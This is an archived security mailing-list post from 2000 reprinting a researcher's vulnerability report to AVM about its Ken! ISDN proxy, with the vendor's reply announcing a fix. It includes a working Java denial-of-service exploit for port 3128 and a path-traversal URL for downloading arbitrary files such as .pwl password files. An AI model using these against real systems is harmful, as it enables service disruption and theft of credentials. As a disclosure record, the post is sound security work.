NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Win2KSecurity Advice> 2000-q2

Subject: AVM Ken! + Statement
From: eAX [Teelicht] (eaxMAD.SCIENTIST.COM)
Date: Wed Apr 19 2000 - 10:52:17 CDT

Next message: Narrow: "More vulnerabilities in FP"
Previous message: Hans Aikema: "Re: netscape POP3 passwd and mails prefs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Copy of the mails end to AVM about the bug

eAX
--------------
Dear AVM Team,
I found two serious (security) bugs in your internet/isdn proxy software AVM Ken!,
and I think I should inform you first about it.
While testing some things on a friends system, which is running Ken! ,I
noticed that I can crash Ken! remotly and force it to cut off all connections,
using a simple Telnet connection. I also found a way to downlaod ANY file from
the Ken! Server. When I say ANY file I mean ANY file!
The Denial of Service attack (crash):
I scanned the system for open ports and noticed that port 3128 was opened by Ken!.
I connected to it via a telnet client and sended some trash (until now just intrested
in the HTTP error message), but then I noticed that Ken! crashs with a pagefault,
closes all connections and restarts.
I retested this with a Windows 98 and a Windows 2000 machine, both Ken!'s crashed.
(Tested with Ken! 1.03.10 (german))
The download everything bug (dangerous!!):
While looking for more bugs, I found out this:
type in your webbrowser:
http://targethost:3128/../../../../../autoexec.bat
or
http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl
If Ken! is located in the C:/Programme/Ken!/ or C:/Program Files/Ken! , this will
cause ken to send you the autoexec.bat, or any file you want (just change the url).
I already cracked a test server to check how dangerous this security hole is, and
I found out that it is extremly dangerous for servers with important files or remote
acess (Windows 2000 telnetd), because the person who set it up for me, installed Ken!
in the default directory. Imagine what would happen if someone would steal a important
database from a server running Ken!
The best thing to prevent misuse is to install Ken! into a diffrent directory until the
bug is fixed (If Ken! isn't located in one of these directorys, you can find the directory
by testing the path until you find autoexec.bat, but this is hard.).
Retested on a LAN and the Internet, with a Windows 98 and a Windows 2000 Server.
(Tested with Ken! 1.03.10 (german))
Your eAX (17 years old)
P.S.Attached to this message is a EXPLOIT CODE written in Java, what can be used
on any OS. I also attached a part of the log file from Ken!.
P.SS. Maybe, I will post this to a security mailing list and rootshell in a few days.
I say a few days, cause I think you should have time to fix the bugs, if you haven't
done this already.
P.SSS. Better luck next time :)
P.SSSS. Fritz Card is really cool!
----Exploit Code------
import java.net.Socket;
import java.io.*;
/*
BARBIE - The AVM KEN! exploit
This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again,
a few seconds later.
Tested with AVM KEN! Version 1.03.10 (german)
*/
class barbie {
String adress;
public void killken() {
PrintWriter out = null;
try{
Socket connection = new Socket( adress, 3128);
System.out.println("");
System.out.println("killing...");
out = new PrintWriter(connection.getOutputStream(), true);
out.println("Whooopppss_Ken_died");
connection.close();
}
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}
}
public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}
}
----------------------
------Log file--------
2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0
2000-04-12 20:40:14 kenserv: TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK
----------------------

Statement:

Here is the staement of the very friendly people from AVM:

eAX

- Statement german -

Das beschriebene Sicherheitsloch beschränkt sich ausschließlich auf das
firmeninterne Netzwerk. Gegenüber dem Internet ist das eigene Firmennetzwerk
komplett durch KEN! (NAT) abgeschirmt. KEN! ist nicht für große Firmen
konzipiert sondern für "kleine Netze" in denen wir von überschaubaren
Arbeitsgruppen ausgehen, die einander vertrauen können.
Davon abgesehen ist das beschriebene Verhalten korrekt, uns seit einigen Tagen
auch bekannt und mit der neusten Version von KEN! 1.04.32 gefixt. Diese Version
steht ab heute auch offiziell zum Download auf dem ADC kostenlos zur Verfügung.

- Statement english -

The described security hole is only exploitable in local networks. The Ken! Server secures itself against attacks from the internet with a NAT shield. Ken! wasn't designed for enterprises but for small networks, were we can expect the people to trust each other.
The described errors exist and are known since a few days. They were fixed in the latest Version of Ken! 1.04.32 which is now officely free for download at the ADC.

-END-

P.S.: Thanks to the people from AVM for being so fast in fixing the bug, you are really cool ;)!
______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net

Next message: Narrow: "More vulnerabilities in FP"
Previous message: Hans Aikema: "Re: netscape POP3 passwd and mails prefs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]